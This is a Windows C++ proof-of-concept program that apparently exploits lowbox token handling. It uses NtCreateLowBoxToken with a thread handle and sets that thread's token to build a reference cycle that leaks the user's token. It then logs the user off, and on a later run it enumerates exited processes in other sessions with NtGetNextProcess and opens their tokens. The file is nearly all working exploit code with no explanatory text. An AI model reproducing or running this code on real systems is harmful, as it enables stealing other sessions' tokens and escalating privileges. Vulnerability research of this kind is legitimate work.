// TestLowBoxToken.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <string>
#include <sstream>
#include <memory>
#include <strsafe.h>

#include <vector>

typedef NTSTATUS(__stdcall *fNtGetNextProcess)(
	HANDLE ProcessHandle,
	ACCESS_MASK DesiredAccess,
	ULONG HandleAttributes,
	ULONG Flags,
	PHANDLE NewProcessHandle);

typedef NTSTATUS(__stdcall *fNtGetNextThread)(
	HANDLE ProcessHandle,
	HANDLE ThreadHandle,
	ACCESS_MASK DesiredAccess,
	ULONG HandleAttributes,
	ULONG Flags,
	PHANDLE NewThreadHandle);

void ClearHandles(std::vector<HANDLE>& hs)
{
	for (HANDLE h : hs)
	{
		CloseHandle(h);
	}

	hs.clear();
}

bool TestProcess()
{
	fNtGetNextProcess pfNtGetNextProcess = (fNtGetNextProcess)GetProcAddress(GetModuleHandle(L"ntdll"), "NtGetNextProcess");
	fNtGetNextThread pfNtGetNextThread = (fNtGetNextThread)GetProcAddress(GetModuleHandle(L"ntdll"), "NtGetNextThread");
	HANDLE hCurr = nullptr;

	DWORD dwCurrSession;

	std::vector<HANDLE> procs;
	std::vector<HANDLE> tokens;

	ProcessIdToSessionId(GetCurrentProcessId(), &dwCurrSession);

	while (pfNtGetNextProcess(hCurr, MAXIMUM_ALLOWED, 0, 0, &hCurr) == 0)
	{
		procs.push_back(hCurr);

		DWORD dwPid = GetProcessId(hCurr);
		DWORD dwSession = 0;
		DWORD dwExitCode = 0;
		ProcessIdToSessionId(dwPid, &dwSession);

		if (GetExitCodeProcess(hCurr, &dwExitCode) && dwExitCode != STILL_ACTIVE)
		{
			if (dwSession != dwCurrSession)
			{
				printf("%p %d %d\n", hCurr, GetProcessId(hCurr), dwSession);
				HANDLE hToken;

				if (::OpenProcessToken(hCurr, MAXIMUM_ALLOWED, &hToken))
				{
					tokens.push_back(hToken);
				}

				HANDLE hThread = nullptr;
				std::vector<HANDLE> threads;

				while (pfNtGetNextThread(hCurr, hThread, MAXIMUM_ALLOWED, 0, 0, &hThread) == 0)
				{
					SetThreadToken(&hThread, nullptr);
					threads.push_back(hThread);
				}
				ClearHandles(threads);
				
			}
		}
	}

	ClearHandles(procs);

	if (tokens.size() > 0)
	{
		for (HANDLE h : tokens)
		{
			printf("%p\n", h);
		}
		getchar();
		return true;
	}	

	return false;
}

typedef NTSTATUS(NTAPI *_NtCreateLowBoxToken)(
	OUT HANDLE * LowBoxTokenHandle,
	IN HANDLE TokenHandle,
	IN ACCESS_MASK DesiredAccess,
	IN OBJECT_ATTRIBUTES * ObjectAttributes OPTIONAL,
	IN PSID PackageSid,
	IN ULONG CapabilityCount OPTIONAL,
	IN PSID_AND_ATTRIBUTES Capabilities OPTIONAL,
	IN ULONG HandleCount OPTIONAL,
	IN HANDLE * Handles OPTIONAL
	);

FARPROC GetProcAddressNT(LPCSTR lpName)
{
	return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}

DWORD CALLBACK StallThread(LPVOID)
{
	return 0;
}

void DoReferenceChain()
{
	_NtCreateLowBoxToken fNtCreateLowBoxToken = (_NtCreateLowBoxToken)GetProcAddress(GetModuleHandle(L"ntdll"), "NtCreateLowBoxToken");	

	HANDLE hToken;

	OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);	

	HANDLE hLowBoxToken;

	PSID psid;

	OBJECT_ATTRIBUTES obj_attr;

	InitializeObjectAttributes(&obj_attr, nullptr, 0, nullptr, nullptr);	

	WCHAR sidbuf[512];

	srand(GetTickCount());

	StringCchPrintf(sidbuf, 512, L"S-1-15-2-1-1-1-1-1-1-%d", rand());
	
	if (ConvertStringSidToSid(sidbuf, &psid))
	{
		HANDLE hs[1];
		hs[0] = CreateThread(nullptr, 0, StallThread, nullptr, 0, nullptr);
		
		NTSTATUS status = fNtCreateLowBoxToken(&hLowBoxToken, hToken, TOKEN_ALL_ACCESS, &obj_attr, psid, 0, nullptr, 1, hs);
		if (NT_SUCCESS(status))
		{
			HANDLE hImpToken;
			if (DuplicateTokenEx(hLowBoxToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenImpersonation, &hImpToken))
			{
				printf("ImpToken: %p\n", hImpToken);
				if (!SetThreadToken(&hs[0], hImpToken))
				{
					printf("Error setting thread token %d\n", GetLastError());
				}
			}

			CloseHandle(hLowBoxToken);
		}
		else
		{
			printf("Error: %08X\n", status);
		}

		CloseHandle(hToken);
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	if (!TestProcess())
	{
		DoReferenceChain();
		ExitWindowsEx(EWX_LOGOFF, 0);
	}

	return 0;
}

